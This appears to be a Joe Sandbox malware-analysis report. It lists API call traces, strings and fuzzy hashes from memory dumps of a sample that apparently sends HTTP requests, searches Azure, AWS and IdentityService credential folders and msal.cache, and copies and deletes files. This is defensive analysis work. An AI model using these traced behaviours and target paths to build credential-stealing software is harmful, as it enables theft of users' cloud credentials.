Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeapstrtok_s$AllocateCloseCreateFolderFreeHandlePathProcessReadSizemallocmemsetstrncpy
String ID:
API String ID: 3689735781-0
Opcode ID: c4d654fd63af8b96c424d1b0ea7922b0682d9adc7819136a205fb9eb7b79f56e
Instruction ID: ab9d025dace0c8d97d4dec2522a4caebe78f3d94bb6abd69e6d7e59368160c8d
Opcode Fuzzy Hash: c4d654fd63af8b96c424d1b0ea7922b0682d9adc7819136a205fb9eb7b79f56e
Instruction Fuzzy Hash: 11D15A75A20308ABCB05EBF4DD95EEEB77ABF14340F508518E102A6198DF38AA45CF61

Function 00405960 Relevance: 42.5, APIs: 19, Strings: 5, Instructions: 493networkstringmemoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6

Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849

Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004059F8
StrCmpCA.SHLWAPI(?,00750148), ref: 00405A13
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405B93
lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,007829B8,00000000,?,00749938,00000000,?,00421A1C), ref: 00405E71
lstrlenA.KERNEL32(00000000), ref: 00405E82
GetProcessHeap.KERNEL32(00000000,?), ref: 00405E93
HeapAlloc.KERNEL32(00000000), ref: 00405E9A
lstrlenA.KERNEL32(00000000), ref: 00405EAF
memcpy.MSVCRT(?,00000000,00000000), ref: 00405EC6
lstrlenA.KERNEL32(00000000), ref: 00405ED8
lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00405EF1
memcpy.MSVCRT(?), ref: 00405EFE
lstrlenA.KERNEL32(00000000,?,?), ref: 00405F1B
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00405F2F
InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00405F4C
InternetCloseHandle.WININET(00000000), ref: 00405FB0
InternetCloseHandle.WININET(00000000), ref: 00405FBD
HttpOpenRequestA.WININET(00000000,00782898,?,007821A8,00000000,00000000,00400100,00000000), ref: 00405BF8

Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12

Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905

Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982

InternetCloseHandle.WININET(00000000), ref: 00405FC7

Strings

------, xrefs: 00405D4C
", xrefs: 00405E16
------, xrefs: 00405A96
------, xrefs: 00405C0B
", xrefs: 00405CD5

Memory Dump Source

Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: lstrlen$Internet$lstrcpy$??2@CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocConnectCrackFileProcessReadSend
String ID: "$"$------$------$------
API String ID: 1406981993-2180234286
Opcode ID: 5a3a4c6f642c51d95aedfef3bc05ad6ab1327865178b1c6bba112ca90ce5864b
Instruction ID: 7b5b204680124ce1d4beb717fdfef1c68a0c63715f2d18b0248442adb904f056
Opcode Fuzzy Hash: 5a3a4c6f642c51d95aedfef3bc05ad6ab1327865178b1c6bba112ca90ce5864b
Instruction Fuzzy Hash: 20124071821118ABCB15FBA1DC95FEEB378BF14314F50419EB10A62091DF782B9ACF69

Function 00414D70 Relevance: 35.1, APIs: 10, Strings: 10, Instructions: 119stringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00414D87

Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B

lstrcatA.KERNEL32(?,00000000), ref: 00414DB0
lstrcatA.KERNEL32(?,\.azure\), ref: 00414DCD

Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943

memset.MSVCRT ref: 00414E13
lstrcatA.KERNEL32(?,00000000), ref: 00414E3C
lstrcatA.KERNEL32(?,\.aws\), ref: 00414E59

Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
Part of subcall function 00414910: FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
Part of subcall function 00414910: FindClose.KERNEL32(000000FF), ref: 00414B92

memset.MSVCRT ref: 00414E9F
lstrcatA.KERNEL32(?,00000000), ref: 00414EC8
lstrcatA.KERNEL32(?,\.IdentityService\), ref: 00414EE5

Part of subcall function 00414910: wsprintfA.USER32 ref: 004149B0
Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,004208D2), ref: 004149C5
Part of subcall function 00414910: wsprintfA.USER32 ref: 004149E2
Part of subcall function 00414910: PathMatchSpecA.SHLWAPI(?,?), ref: 00414A1E
Part of subcall function 00414910: lstrcatA.KERNEL32(?,00750258,?,000003E8), ref: 00414A4A
Part of subcall function 00414910: lstrcatA.KERNEL32(?,00420FF8), ref: 00414A5C
Part of subcall function 00414910: lstrcatA.KERNEL32(?,?), ref: 00414A70
Part of subcall function 00414910: lstrcatA.KERNEL32(?,00420FFC), ref: 00414A82
Part of subcall function 00414910: lstrcatA.KERNEL32(?,?), ref: 00414A96
Part of subcall function 00414910: CopyFileA.KERNEL32(?,?,00000001), ref: 00414AAC
Part of subcall function 00414910: DeleteFileA.KERNEL32(?), ref: 00414B31

memset.MSVCRT ref: 00414F2B

Strings

msal.cache, xrefs: 00414EF0
Azure\.azure, xrefs: 00414DD3
*.*, xrefs: 00414DD8
\.IdentityService\, xrefs: 00414ED9
Azure\.aws, xrefs: 00414E5F
Azure\.IdentityService, xrefs: 00414EEB
zaA, xrefs: 00414DF1, 00414E7D, 00414F09, 00414F34, 00414DF4, 00414E80, 00414F0C
*.*, xrefs: 00414E64
\.azure\, xrefs: 00414DC1
\.aws\, xrefs: 00414E4D

Memory Dump Source

Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: lstrcat$Filememset$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache$zaA
API String ID: 4017274736-156832076
Opcode ID: 7769cd15d224279b6a8c431d0011313115eb2ccd46c8e18735444d99bbb5ff41
Instruction ID: 18812f4626155d1e2a42465cb68794f5c6847905bec5d07e7ac1139e0e5490f3
Opcode Fuzzy Hash: 7769cd15d224279b6a8c431d0011313115eb2ccd46c8e18735444d99bbb5ff41
Instruction Fuzzy Hash: 3141D6B9A4031467C710F7B0EC47FDD3738AB64704F404459B645660C2EEB897D98B9A

Function 022AD157 Relevance: 31.9, APIs: 21, Instructions: 374stringmemoryfileCOMMON

Download Yara Rule

APIs

Part of subcall function 022BA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022BA9EF

Part of subcall function 022BAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022BAC2C
Part of subcall function 022BAC17: lstrcpy.KERNEL32(00000000), ref: 022BAC6B
Part of subcall function 022BAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022BAC79

Part of subcall function 022BAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022BAB6C

Part of subcall function 022B8DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,022A1660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 022B8DED

Part of subcall function 022BAB87: lstrcpy.KERNEL32(00000000,?), ref: 022BABD9
Part of subcall function 022BAB87: lstrcat.KERNEL32(00000000), ref: 022BABE9

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 022AD1EA
GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 022AD32E
RtlAllocateHeap.NTDLL(00000000), ref: 022AD335
lstrcat.KERNEL32(?,00000000), ref: 022AD46F
lstrcat.KERNEL32(?,00421478), ref: 022AD47E
lstrcat.KERNEL32(?,00000000), ref: 022AD491
lstrcat.KERNEL32(?,0042147C), ref: 022AD4A0
lstrcat.KERNEL32(?,00000000), ref: 022AD4B3
lstrcat.KERNEL32(?,00421480), ref: 022AD4C2
lstrcat.KERNEL32(?,00000000), ref: 022AD4D5
lstrcat.KERNEL32(?,00421484), ref: 022AD4E4
lstrcat.KERNEL32(?,00000000), ref: 022AD4F7
lstrcat.KERNEL32(?,00421488), ref: 022AD506
lstrcat.KERNEL32(?,00000000), ref: 022AD519
lstrcat.KERNEL32(?,0042148C), ref: 022AD528
lstrcat.KERNEL32(?,00000000), ref: 022AD53B
lstrcat.KERNEL32(?,00421490), ref: 022AD54A

Part of subcall function 022BAA87: lstrlen.KERNEL32(022A516C,?,?,022A516C,00420DDE), ref: 022BAA92
Part of subcall function 022BAA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 022BAAEC

lstrlen.KERNEL32(?), ref: 022AD591
lstrlen.KERNEL32(?), ref: 022AD5A0
memset.MSVCRT ref: 022AD5EF

Part of subcall function 022BACD7: StrCmpCA.SHLWAPI(0064A350,022AAA0E,?,022AAA0E,0064A350), ref: 022BACF6

DeleteFileA.KERNEL32(00000000), ref: 022AD61B

Memory Dump Source

Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTimememset
String ID:
API String ID: 1973479514-0
Opcode ID: 35b3a7c6026b7343794acd9bc88f8a24a43edb670061b4873ce96399e81ec4f6
Instruction ID: 23bace1a0c9bff38faa9fe3ab7639e09e802b0f143f94a6699cf99d9f4961d4d
Opcode Fuzzy Hash: 35b3a7c6026b7343794acd9bc88f8a24a43edb670061b4873ce96399e81ec4f6
Instruction Fuzzy Hash: 02E16975960208ABCB09FBE4DD95EEE737ABF25341F104159F106A71A8DF34AA08CF61

Function 0040CEF0 Relevance: 31.9, APIs: 21, Instructions: 374stringmemoryfileCOMMON

Download Yara Rule

APIs

Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788

Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12

Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905

Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,00749878,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86

Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040CF83
GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040D0C7
HeapAlloc.KERNEL32(00000000), ref: 0040D0CE
lstrcatA.KERNEL32(?,00000000,007500C8,00421474,007500C8,00421470,00000000), ref: 0040D208
lstrcatA.KERNEL32(?,00421478), ref: 0040D217
lstrcatA.KERNEL32(?,00000000), ref: 0040D22A
lstrcatA.KERNEL32(?,0042147C), ref: 0040D239
lstrcatA.KERNEL32(?,00000000), ref: 0040D24C
lstrcatA.KERNEL32(?,00421480), ref: 0040D25B
lstrcatA.KERNEL32(?,00000000), ref: 0040D26E
lstrcatA.KERNEL32(?,00421484), ref: 0040D27D
lstrcatA.KERNEL32(?,00000000), ref: 0040D290
lstrcatA.KERNEL32(?,00421488), ref: 0040D29F
lstrcatA.KERNEL32(?,00000000), ref: 0040D2B2
lstrcatA.KERNEL32(?,0042148C), ref: 0040D2C1
lstrcatA.KERNEL32(?,00000000), ref: 0040D2D4
lstrcatA.KERNEL32(?,00421490), ref: 0040D2E3

Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,007478F8,?,0042110C,?,00000000), ref: 0041A82B
Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885

lstrlenA.KERNEL32(?), ref: 0040D32A
lstrlenA.KERNEL32(?), ref: 0040D339
memset.MSVCRT ref: 0040D388

Part of subcall function 0041AA70: StrCmpCA.SHLWAPI(00000000,00421470,0040D1A2,00421470,00000000), ref: 0041AA8F

DeleteFileA.KERNEL32(00000000), ref: 0040D3B4

Memory Dump Source

Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocCopyDeleteProcessSystemTimememset
String ID:
API String ID: 2775534915-0
Opcode ID: 53bd777a164c53d73cfd4da9e271e087aec51a26bbdffb0079736ca23cb72688
Instruction ID: 94f9062ed3f4a6e26da847402fe0a382ec35b8ad99342330bde04fa79d6a5422
Opcode Fuzzy Hash: 53bd777a164c53d73cfd4da9e271e087aec51a26bbdffb0079736ca23cb72688
Instruction Fuzzy Hash: D2E17D75950108ABCB04FBE1DD96EEE7379BF14304F10405EF107B60A1DE38AA5ACB6A

Function 022A5BC7 Relevance: 29.0, APIs: 19, Instructions: 493networkstringmemoryCOMMON

Download Yara Rule

APIs

Part of subcall function 022BAA07: lstrcpy.KERNEL32(?,00000000), ref: 022BAA4D

Part of subcall function 022A4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022A4A51
Part of subcall function 022A4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022A4A68
Part of subcall function 022A4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022A4A7F
Part of subcall function 022A4A17: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 022A4AA0
Part of subcall function 022A4A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 022A4AB0

Part of subcall function 022BA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022BA9EF

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 022A5C5F
StrCmpCA.SHLWAPI(?,0064A480), ref: 022A5C7A
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 022A5DFA
lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,00421A20,00000000,?,0064A0F0,00000000,?,0064A2F0,00000000,?,00421A1C), ref: 022A60D8
lstrlen.KERNEL32(00000000), ref: 022A60E9
GetProcessHeap.KERNEL32(00000000,?), ref: 022A60FA
RtlAllocateHeap.NTDLL(00000000), ref: 022A6101
lstrlen.KERNEL32(00000000), ref: 022A6116
memcpy.MSVCRT(?,00000000,00000000), ref: 022A612D
lstrlen.KERNEL32(00000000), ref: 022A613F
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 022A6158
memcpy.MSVCRT(?), ref: 022A6165
lstrlen.KERNEL32(00000000,?,?), ref: 022A6182
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 022A6196
InternetReadFile.WININET(00000000,?,000000C7,?), ref: 022A61B3
InternetCloseHandle.WININET(00000000), ref: 022A6217
InternetCloseHandle.WININET(00000000), ref: 022A6224
HttpOpenRequestA.WININET(00000000,0064A49C,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 022A5E5F

Part of subcall function 022BAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022BAC2C
Part of subcall function 022BAC17: lstrcpy.KERNEL32(00000000), ref: 022BAC6B
Part of subcall function 022BAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022BAC79

Part of subcall function 022BAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022BAB6C

Part of subcall function 022BAB87: lstrcpy.KERNEL32(00000000,?), ref: 022BABD9
Part of subcall function 022BAB87: lstrcat.KERNEL32(00000000), ref: 022BABE9

InternetCloseHandle.WININET(00000000), ref: 022A622E

Memory Dump Source

Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: lstrlen$Internet$lstrcpy$??2@CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocateConnectCrackFileProcessReadSend
String ID:
API String ID: 1703137719-0
Opcode ID: 953f36d5d89b78922954f70e89b18a367f9e390412a3d758b9e507f35f40a690
Instruction ID: 087d01ae22a7ff687a13f051d3af09efe0ca7ed39af6135d58f04e755f6a8304
Opcode Fuzzy Hash: 953f36d5d89b78922954f70e89b18a367f9e390412a3d758b9e507f35f40a690
Instruction Fuzzy Hash: C412DE71970318ABCB16EBE4DD95FEEB37ABF24740F504199A106A2194EF742B88CF50

Function 022ACBF7 Relevance: 26.6, APIs: 14, Strings: 1, Instructions: 383filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 022BA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022BA9EF

Part of subcall function 022BAB87: lstrcpy.KERNEL32(00000000,?), ref: 022BABD9
Part of subcall function 022BAB87: lstrcat.KERNEL32(00000000), ref: 022BABE9

Part of subcall function 022BAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022BAB6C

Part of subcall function 022BAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022BAC2C
Part of subcall function 022BAC17: lstrcpy.KERNEL32(00000000), ref: 022BAC6B
Part of subcall function 022BAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022BAC79

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0064A63C,00000000,?,0042144C,00000000,?,?), ref: 022ACCD3
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 022ACCF0
GetFileSize.KERNEL32(00000000,00000000), ref: 022ACCFC
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 022ACD0F
??2@YAPAXI@Z.MSVCRT(-00000001), ref: 022ACD1C
ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 022ACD40
StrStrA.SHLWAPI(?,0064A1B0,00420B52), ref: 022ACD5E
StrStrA.SHLWAPI(00000000,0064A364), ref: 022ACD85
StrStrA.SHLWAPI(?,0064A4D0,00000000,?,00421458,00000000,?,00000000,00000000,?,0064A15C,00000000,?,00421454,00000000,?), ref: 022ACF09
StrStrA.SHLWAPI(00000000,0064A4CC), ref: 022ACF20

Part of subcall function 022ACA87: memset.MSVCRT ref: 022ACABA
Part of subcall function 022ACA87: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 022ACAD8
Part of subcall function 022ACA87: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 022ACAE3
Part of subcall function 022ACA87: memcpy.MSVCRT(?,?,?), ref: 022ACB79

StrStrA.SHLWAPI(?,0064A4CC,00000000,?,0042145C,00000000,?,00000000,0064A0DC), ref: 022ACFC1
StrStrA.SHLWAPI(00000000,0064A5A8), ref: 022ACFD8

Part of subcall function 022ACA87: lstrcat.KERNEL32(?,00420B46), ref: 022ACBAA
Part of subcall function 022ACA87: lstrcat.KERNEL32(?,00420B47), ref: 022ACBBE
Part of subcall function 022ACA87: lstrcat.KERNEL32(?,00420B4E), ref: 022ACBDF

lstrlen.KERNEL32(00000000), ref: 022AD0AB
CloseHandle.KERNEL32(00000000), ref: 022AD103

Strings

, xrefs: 022ACC2D

Memory Dump Source

Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$??2@BinaryCloseCreateCryptHandleReadSizeStringmemcpymemset
String ID:
API String ID: 3555725114-3916222277
Opcode ID: 9842806969cad6799f0f7568e9bc81044bc23dbf52ae901b6399e5f6c005bae5
Instruction ID: 2a8c4103ed2ced3f98ad1eb2c8efce3c1417cf32eedb3b180e2cb7e34e6132fc
Opcode Fuzzy Hash: 9842806969cad6799f0f7568e9bc81044bc23dbf52ae901b6399e5f6c005bae5
Instruction Fuzzy Hash: 3CE1FF75920208ABCB16EFE4DD91EEEB77ABF25340F104159F106A7198DF346A89CF60

Function 0040C990 Relevance: 26.6, APIs: 14, Strings: 1, Instructions: 383filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788

Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982

Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905

Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,007812E8,00000000,?,0042144C,00000000,?,?), ref: 0040CA6C
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040CA89
GetFileSize.KERNEL32(00000000,00000000), ref: 0040CA95
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040CAA8
??2@YAPAXI@Z.MSVCRT(-00000001), ref: 0040CAB5
ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040CAD9
StrStrA.SHLWAPI(?,00781588,00420B52), ref: 0040CAF7
StrStrA.SHLWAPI(00000000,00781318), ref: 0040CB1E
StrStrA.SHLWAPI(?,00781ED8,00000000,?,00421458,00000000,?,00000000,00000000,?,00750088,00000000,?,00421454,00000000,?), ref: 0040CCA2
StrStrA.SHLWAPI(00000000,00781F78), ref: 0040CCB9

Part of subcall function 0040C820: memset.MSVCRT ref: 0040C853
Part of subcall function 0040C820: lstrlenA.KERNEL32(?,00000001,?,00000000,00000000,00000000,00000000,?,007500B8), ref: 0040C871
Part of subcall function 0040C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0040C87C
Part of subcall function 0040C820: memcpy.MSVCRT(?,?,?), ref: 0040C912

StrStrA.SHLWAPI(?,00781F78,00000000,?,0042145C,00000000,?,00000000,007500B8), ref: 0040CD5A
StrStrA.SHLWAPI(00000000,00750188), ref: 0040CD71

Part of subcall function 0040C820: lstrcatA.KERNEL32(?,00420B46), ref: 0040C943
Part of subcall function 0040C820: lstrcatA.KERNEL32(?,00420B47), ref: 0040C957
Part of subcall function 0040C820: lstrcatA.KERNEL32(?,00420B4E), ref: 0040C978

lstrlenA.KERNEL32(00000000), ref: 0040CE44
CloseHandle.KERNEL32(00000000), ref: 0040CE9C

Strings

, xrefs: 0040C9C6

Memory Dump Source

Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$??2@BinaryCloseCreateCryptHandleReadSizeStringmemcpymemset
String ID:
API String ID: 3555725114-3916222277
Opcode ID: 7ebf70302f9c6978d5b17e417954d9c1afb0afdf58622d108c0dd4a829574462
Instruction ID: fb2464dfdb87d028b9341c66972094ccea7bc9213c5b9a6eafc00a4a54def107
Opcode Fuzzy Hash: 7ebf70302f9c6978d5b17e417954d9c1afb0afdf58622d108c0dd4a829574462
Instruction Fuzzy Hash: 2FE13E71911108ABCB14FBA1DC91FEEB779AF14314F40416EF10673191EF386A9ACB6A

Function 004112D0 Relevance: 26.6, APIs: 13, Strings: 2, Instructions: 308stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 00411307
strtok_s.MSVCRT ref: 00411750

Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,007478F8,?,0042110C,?,00000000), ref: 0041A82B
Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885

Strings

x'x, xrefs: 004115EF
0'x, xrefs: 00411560

Memory Dump Source

Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: strtok_s$lstrcpylstrlen
String ID: 0'x$x'x
API String ID: 348468850-397258310
Opcode ID: 432a9195c80f8163cf1e39b3f593716d90b1ba62d7a840187ccff8139da5087c
Instruction ID: 4a233ae47f87f64f9a2ed81d2cca976e3c75948f423937a2df4e62cfbc7c3e06
Opcode Fuzzy Hash: 432a9195c80f8163cf1e39b3f593716d90b1ba62d7a840187ccff8139da5087c
